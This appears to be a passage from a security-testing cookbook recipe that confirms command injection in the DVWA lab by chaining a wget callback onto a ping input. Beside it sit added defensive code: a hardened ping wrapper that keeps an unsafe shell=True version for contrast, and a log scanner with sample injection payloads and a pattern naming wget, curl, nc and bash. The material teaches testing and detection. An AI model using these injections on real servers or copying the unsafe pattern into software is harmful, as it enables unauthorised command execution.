How to do it...

Let's validate command-injection vulnerabilities with HTTP traffic:

  1. It is possible to validate a command-injection vulnerability in a web application by executing commands that force the backend system to interact with a web server that you own.
  2. That web server's logs can then be examined for evidence that the vulnerable server contacted it. Alternatively, a custom script can be written that generates an ad hoc web service, listens for external connections, and prints the requests received. The following is an example of a Python script that does just that:
#!/usr/bin/env python3

import socket

# Ad hoc listener: accept a single TCP connection on port 8000 and print
# whatever the client sends (for a wget/curl callback, the raw HTTP request).
httprecv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httprecv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
httprecv.bind(("0.0.0.0", 8000))
httprecv.listen(2)

# accept() returns the client socket and the (ip, port) tuple of the peer
(client, (ip, port)) = httprecv.accept()
print("Received connection from :", ip)
data = client.recv(4096)
# Decode the raw bytes for display; non-UTF-8 bytes are replaced rather than crashing
print(data.decode("utf-8", errors="replace"))

client.close()
httprecv.close()
  3. Once the script has been executed, we need to force the target server to interact with the listening service to confirm the command-injection vulnerability. The DVWA application has a ping utility that can be used to ping a provided IP address.
  4. The user input is directly passed to a system call and can be modified to execute arbitrary commands in the underlying operating system. We can append multiple commands using a semicolon followed by each subsequent command, as shown in the following screenshot:
  5. In the example provided, input was given to ping 127.0.0.1 and perform a wget request on http://172.16.69.133:8000. The wget request corresponds to the ad hoc listening Python service. After submitting the input, we can verify that the command was executed by referring to the output of the script, as follows:
  6. Here, we can see that a connection was received from the target web server and that the user agent used to access the web service was wget. The curl command is another alternative that could be used if wget is not installed.
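The root cause described in step 4 is user input reaching a system call through a shell, where a semicolon starts a second command. The following Python example, added here and not part of the book or of DVWA, shows the same ping utility written so that the input never reaches a shell: the target is validated as an IP literal or hostname, and ping is invoked with an argv list. The function names (`is_valid_ping_target`, `build_ping_command`, `safe_ping`) and the `count` limit are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Hardened ping wrapper (added example, not DVWA's code).

Two defences are combined: strict validation of the target, and running
ping with an argv list so that ';', '&&', '|' or '$(...)' in the input
are never interpreted by a shell.
"""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: dot-separated labels of letters, digits and '-',
# no label starting or ending with '-'. Shell metacharacters cannot match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_ping_target(value: str) -> bool:
    """Accept only an IPv4/IPv6 literal or a syntactically valid hostname."""
    value = value.strip()
    if not value:
        return False
    try:
        ipaddress.ip_address(value)   # raises ValueError if not an IP literal
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))


def build_ping_command(target: str, count: int = 4) -> List[str]:
    """Return the argv list for ping, rejecting anything that is not a plain target.

    Raises ValueError instead of passing a suspicious value to the OS.
    """
    if not is_valid_ping_target(target):
        raise ValueError("invalid ping target")
    if not 1 <= count <= 10:            # hypothetical cap to limit abuse of the endpoint
        raise ValueError("count out of range")
    # Each argument is a separate list element: no shell, no command chaining.
    return ["ping", "-c", str(count), target.strip()]


def safe_ping(target: str, count: int = 4, timeout: float = 15.0) -> subprocess.CompletedProcess:
    """Run ping without a shell; the input is only ever one argv element."""
    argv = build_ping_command(target, count)
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False)


# The pattern the recipe exploits, kept for contrast only: the whole string
# is handed to a shell, so "127.0.0.1; wget http://..." runs two commands.
def unsafe_ping(target: str) -> subprocess.CompletedProcess:  # do not use
    return subprocess.run(f"ping -c 4 {target}", shell=True,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "127.0.0.1; wget http://172.16.69.133:8000"]:
        try:
            print(candidate, "->", build_ping_command(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

Validation on its own is not the primary control; the argv list is. Even if the allow-list were loosened, `subprocess.run` with a list and `shell=False` passes the target to ping as a single argument, so a semicolon or `&&` inside it is just part of a hostname that ping fails to resolve.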
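Step 6 confirms the injection from the attacker's listener; on the defending side, the same attempt is visible in the web server's access log as a ping parameter carrying a command separator and a download tool name. The following Python example, added here and not taken from the book, scans constructed access-log lines in combined-log format for that pattern. The request path, the parameter name `ip` and the log lines themselves are constructed for this example; the callback address 172.16.69.133:8000 is the one used in the recipe.

```python
#!/usr/bin/env python3
"""Detect command-injection attempts in web access logs (added example).

Decodes each request's query string and flags parameter values that contain
shell command separators, reporting any network tool named in the payload.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Common/combined log format: client ip, identity, user, [time], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Characters that start a second command in a POSIX shell (and a newline, which does too)
CHAIN_RE = re.compile(r"[;&|`$\n]")
# Tools typically used to make a server call back to an attacker-controlled host
TOOL_RE = re.compile(r"\b(wget|curl|nc|ncat|bash|sh|python|perl)\b", re.IGNORECASE)

# Constructed sample log: two benign pings and two injection attempts.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1 HTTP/1.1" 200 1043
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1%3B+wget+http%3A%2F%2F172.16.69.133%3A8000 HTTP/1.1" 200 1127
10.0.0.7 - - [10/Oct/2023:13:57:12 +0000] "GET /vulnerabilities/exec/?ip=8.8.8.8 HTTP/1.1" 200 1040
10.0.0.5 - - [10/Oct/2023:13:58:44 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1%26%26curl+http%3A%2F%2F172.16.69.133%3A8000 HTTP/1.1" 200 1127
"""


def find_injection_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per parameter value that contains a command separator."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        # parse_qs percent-decodes values and turns '+' into spaces, so the
        # payload is examined in the form the application actually received.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if not CHAIN_RE.search(value):
                    continue
                tools = sorted({t.lower() for t in TOOL_RE.findall(value)})
                findings.append({
                    "time": m["time"],
                    "src": m["ip"],
                    "param": name,
                    "value": value,
                    "tools": tools,
                })
    return findings


if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['src']} param={f['param']} tools={f['tools']} value={f['value']!r}")
```

A separator alone is a weak signal on parameters that legitimately hold free text, so in practice the rule is scoped to parameters that should only ever carry a hostname or address; the tool names are reported to help triage, not as a precondition for alerting, since an injected command need not name any of them.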